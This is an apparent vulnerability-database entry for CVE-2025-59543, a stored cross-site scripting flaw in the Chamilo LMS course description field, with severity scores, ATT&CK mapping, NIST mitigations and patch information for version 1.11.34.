CVE-2025-59543
Published: 06 March 2026
Summary
CVE-2025-59543 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Chamilo Chamilo Lms. Its CVSS base score is 9.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007); ranked at the 15.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
SI-10 requires validating inputs like course descriptions to prevent injection of malicious JavaScript, directly addressing the insufficient input sanitization causing this stored XSS.
SI-15 mandates filtering information outputs, such as encoding user-supplied course descriptions before rendering, to block execution of injected scripts in viewers' browsers.
SI-2 ensures timely flaw remediation, including patching to version 1.11.34, which fixes the specific XSS vulnerability in the course description field.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS directly enables arbitrary JavaScript execution in victim browsers (T1059.007) and facilitates session cookie theft or hijacking (T1185/T1539) leading to account takeover.
NVD Description
Chamilo is a learning management system. Prior to version 1.11.34, there is a stored cross-site scripting (XSS) vulnerability. By injecting malicious JavaScript into the course description field, an attacker with a low-privileged account (e.g., trainer) can execute arbitrary JavaScript code…
more
in the context of any other user viewing the course information page, including administrators. This allows an attacker to exfiltrate sensitive session cookies or tokens, resulting in account takeover (ATO) of higher-privileged users. This issue has been patched in version 1.11.34.
Deeper analysisAI
CVE-2025-59543 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting Chamilo, an open-source learning management system (LMS). The flaw exists in versions prior to 1.11.34, specifically within the course description field, where insufficient input sanitization allows the injection of malicious JavaScript code. This issue carries a high CVSS v3.1 base score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H), reflecting its potential for significant impact across confidentiality, integrity, and availability.
An attacker with a low-privileged account, such as a trainer, can exploit this vulnerability by injecting malicious JavaScript into the course description field. When any other user, including administrators, views the course information page, the script executes in their browser context. This enables the theft of sensitive data like session cookies or authentication tokens, potentially leading to account takeover (ATO) of higher-privileged users.
The vulnerability has been addressed in Chamilo version 1.11.34, as detailed in the official release notes and a corresponding GitHub security advisory (GHSA-p32q-6gh3-3gcv). Security practitioners should prioritize upgrading to the patched version and review existing courses for injected payloads, while implementing content security policies (CSP) to further mitigate XSS risks in Chamilo deployments.
Details
- CWE(s)